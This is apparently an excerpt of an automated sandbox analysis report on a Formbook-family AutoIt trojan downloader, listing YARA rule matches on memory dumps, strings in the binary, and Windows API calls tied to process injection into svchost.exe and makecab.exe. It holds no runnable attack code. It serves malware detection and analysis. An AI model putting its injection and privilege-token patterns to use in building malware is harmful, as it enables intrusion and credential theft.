            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.4102732817.0000000004C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4100790450.0000000004470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1984172906.0000000000EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4099201806.0000000002810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1983942569.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4100789193.0000000005070000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4100844845.00000000044B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1984670172.0000000006350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Binary is likely a compiled AutoIt script file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: This is a third-party compiled AutoIt script.0_2_00883B4C
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe, 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_31954aa9-e
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe, 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_75917130-e
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_c5ddfec0-c
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_9c41869f-e
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042B573 NtClose,1_2_0042B573
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872B60 NtClose,LdrInitializeThunk,1_2_03872B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03872DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038735C0 NtCreateMutant,LdrInitializeThunk,1_2_038735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03874340 NtSetContextThread,1_2_03874340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03874650 NtSuspendThread,1_2_03874650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872B80 NtQueryInformationFile,1_2_03872B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872BA0 NtEnumerateValueKey,1_2_03872BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872BE0 NtQueryValueKey,1_2_03872BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872BF0 NtAllocateVirtualMemory,1_2_03872BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872AB0 NtWaitForSingleObject,1_2_03872AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872AD0 NtReadFile,1_2_03872AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872AF0 NtWriteFile,1_2_03872AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872F90 NtProtectVirtualMemory,1_2_03872F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872FA0 NtQuerySection,1_2_03872FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872FB0 NtResumeThread,1_2_03872FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872FE0 NtCreateFile,1_2_03872FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872F30 NtCreateSection,1_2_03872F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872F60 NtCreateProcessEx,1_2_03872F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872E80 NtReadVirtualMemory,1_2_03872E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872EA0 NtAdjustPrivilegesToken,1_2_03872EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872EE0 NtQueueApcThread,1_2_03872EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872E30 NtWriteVirtualMemory,1_2_03872E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872DB0 NtEnumerateKey,1_2_03872DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872DD0 NtDelayExecution,1_2_03872DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872D00 NtSetInformationFile,1_2_03872D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872D10 NtMapViewOfSection,1_2_03872D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872D30 NtUnmapViewOfSection,1_2_03872D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872CA0 NtQueryInformationToken,1_2_03872CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872CC0 NtQueryVirtualMemory,1_2_03872CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872CF0 NtOpenProcess,1_2_03872CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872C00 NtQueryInformationProcess,1_2_03872C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872C60 NtCreateKey,1_2_03872C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872C70 NtFreeVirtualMemory,1_2_03872C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03873090 NtSetValueKey,1_2_03873090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03873010 NtOpenDirectoryObject,1_2_03873010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038739B0 NtGetContextThread,1_2_038739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03873D10 NtOpenProcessToken,1_2_03873D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03873D70 NtOpenThread,1_2_03873D70
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04714650 NtSuspendThread,LdrInitializeThunk,6_2_04714650
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04714340 NtSetContextThread,LdrInitializeThunk,6_2_04714340
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_04712C70
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712C60 NtCreateKey,LdrInitializeThunk,6_2_04712C60
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_04712CA0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_04712D30
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712D10 NtMapViewOfSection,LdrInitializeThunk,6_2_04712D10
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_04712DF0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712DD0 NtDelayExecution,LdrInitializeThunk,6_2_04712DD0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712EE0 NtQueueApcThread,LdrInitializeThunk,6_2_04712EE0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_04712E80
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712F30 NtCreateSection,LdrInitializeThunk,6_2_04712F30
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712FE0 NtCreateFile,LdrInitializeThunk,6_2_04712FE0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712FB0 NtResumeThread,LdrInitializeThunk,6_2_04712FB0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712AF0 NtWriteFile,LdrInitializeThunk,6_2_04712AF0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712AD0 NtReadFile,LdrInitializeThunk,6_2_04712AD0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712B60 NtClose,LdrInitializeThunk,6_2_04712B60
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_04712BF0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712BE0 NtQueryValueKey,LdrInitializeThunk,6_2_04712BE0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_04712BA0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047135C0 NtCreateMutant,LdrInitializeThunk,6_2_047135C0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047139B0 NtGetContextThread,LdrInitializeThunk,6_2_047139B0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712C00 NtQueryInformationProcess,6_2_04712C00
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712CF0 NtOpenProcess,6_2_04712CF0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712CC0 NtQueryVirtualMemory,6_2_04712CC0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712D00 NtSetInformationFile,6_2_04712D00
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712DB0 NtEnumerateKey,6_2_04712DB0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712E30 NtWriteVirtualMemory,6_2_04712E30
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712EA0 NtAdjustPrivilegesToken,6_2_04712EA0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712F60 NtCreateProcessEx,6_2_04712F60
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712FA0 NtQuerySection,6_2_04712FA0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712F90 NtProtectVirtualMemory,6_2_04712F90
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712AB0 NtWaitForSingleObject,6_2_04712AB0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712B80 NtQueryInformationFile,6_2_04712B80
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04713010 NtOpenDirectoryObject,6_2_04713010
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04713090 NtSetValueKey,6_2_04713090
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04713D70 NtOpenThread,6_2_04713D70
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04713D10 NtOpenProcessToken,6_2_04713D10
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_02838030 NtClose,6_2_02838030
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_02838190 NtAllocateVirtualMemory,6_2_02838190
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_02837EA0 NtReadFile,6_2_02837EA0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_02837F90 NtDeleteFile,6_2_02837F90
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_02837D40 NtCreateFile,6_2_02837D40
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008E40B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,0_2_008E40B1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008D8858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_008D8858
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008E545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_008E545F
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_0088E8000_2_0088E800
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008ADBB50_2_008ADBB5
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_0090804A0_2_0090804A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_0088E0600_2_0088E060
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008941400_2_00894140
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008A24050_2_008A2405
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008B65220_2_008B6522
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008B267E0_2_008B267E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_009006650_2_00900665
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008A283A0_2_008A283A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008968430_2_00896843
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008B89DF0_2_008B89DF
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008B6A940_2_008B6A94
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_00900AE20_2_00900AE2
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_00898A0E0_2_00898A0E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008DEB070_2_008DEB07
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008E8B130_2_008E8B13
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008ACD610_2_008ACD61
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008B70060_2_008B7006
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008931900_2_00893190
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_0089710E0_2_0089710E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008812870_2_00881287
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008A33C70_2_008A33C7
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008AF4190_2_008AF419
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008956800_2_00895680
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008A16C40_2_008A16C4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008958C00_2_008958C0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008A78D30_2_008A78D3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008A1BB80_2_008A1BB8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008B9D050_2_008B9D05
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_0088FE400_2_0088FE40
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008A1FD00_2_008A1FD0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008ABFE60_2_008ABFE6
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_011036500_2_01103650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004028611_2_00402861
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004028701_2_00402870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004010D01_2_004010D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041014A1_2_0041014A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004101531_2_00410153
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042D9A31_2_0042D9A3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004032C01_2_004032C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416AB31_2_00416AB3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416AB81_2_00416AB8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004023571_2_00402357
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004023601_2_00402360
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004103731_2_00410373
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E3F31_2_0040E3F3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004025501_2_00402550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E3F01_2_0384E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039003E61_2_039003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FA3521_2_038FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C02C01_2_038C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E02741_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F41A21_2_038F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039001AA1_2_039001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F81CC1_2_038F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038301001_2_03830100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DA1181_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C81581_2_038C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D20001_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383C7C01_2_0383C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038647501_2_03864750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038407701_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385C6E01_2_0385C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039005911_2_03900591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038405351_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EE4F61_2_038EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E44201_2_038E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F24461_2_038F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F6BD71_2_038F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FAB401_2_038FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA801_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A01_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0390A9A61_2_0390A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038569621_2_03856962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038268B81_2_038268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E8F01_2_0386E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384A8401_2_0384A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038428401_2_03842840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BEFA01_2_038BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03832FC81_2_03832FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03882F281_2_03882F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03860F301_2_03860F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E2F301_2_038E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B4F401_2_038B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03852E901_2_03852E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FCE931_2_038FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FEEDB1_2_038FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FEE261_2_038FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840E591_2_03840E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03858DBF1_2_03858DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383ADE01_2_0383ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384AD001_2_0384AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DCD1F1_2_038DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0CB51_2_038E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830CF21_2_03830CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840C001_2_03840C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0388739A1_2_0388739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F132D1_2_038F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382D34C1_2_0382D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038452A01_2_038452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385B2C01_2_0385B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E12ED1_2_038E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385D2F01_2_0385D2F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384B1B01_2_0384B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0387516C1_2_0387516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382F1721_2_0382F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0390B16B1_2_0390B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EF0CC1_2_038EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038470C01_2_038470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F70E91_2_038F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FF0E01_2_038FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FF7B01_2_038FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F16CC1_2_038F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038856301_2_03885630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DD5B01_2_038DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039095C31_2_039095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F75711_2_038F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FF43F1_2_038FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038314601_2_03831460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385FB801_2_0385FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B5BF01_2_038B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0387DBF91_2_0387DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FFB761_2_038FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DDAAC1_2_038DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03885AA01_2_03885AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E1AA31_2_038E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EDAC61_2_038EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FFA491_2_038FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F7A461_2_038F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B3A6C1_2_038B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D59101_2_038D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038499501_2_03849950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385B9501_2_0385B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038438E01_2_038438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AD8001_2_038AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03841F921_2_03841F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FFFB11_2_038FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03803FD21_2_03803FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03803FD51_2_03803FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FFF091_2_038FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03849EB01_2_03849EB0
